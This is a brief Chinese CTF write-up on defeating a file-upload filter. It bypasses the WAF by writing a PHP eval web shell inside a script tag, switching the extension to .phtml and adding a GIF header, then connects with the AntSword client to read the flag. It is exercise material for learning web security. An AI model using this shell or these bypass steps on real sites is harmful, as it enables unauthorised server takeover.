一进去 看
不能在明显的文件 上传了 最多就是rao waf
随便上传个webshell.php
肯定要用到抓包了
抓到请求包
准备改
常规操作失效 还有层waf
还有一层。。
它检测了文件内容 HTML解码 得到 <?
这里可以改成 <script language="pHp">eval($_POST['hack']);</script>
页面 html标记 php语言
一般这样就要 将 php 改成 phtml了
又过了一层
最后 需要改文件头了
改成图片文件头
让它匹配到这是一张 gif图
能够访问 就是上传成功了
上传成功蚁剑连接 根目录下放flag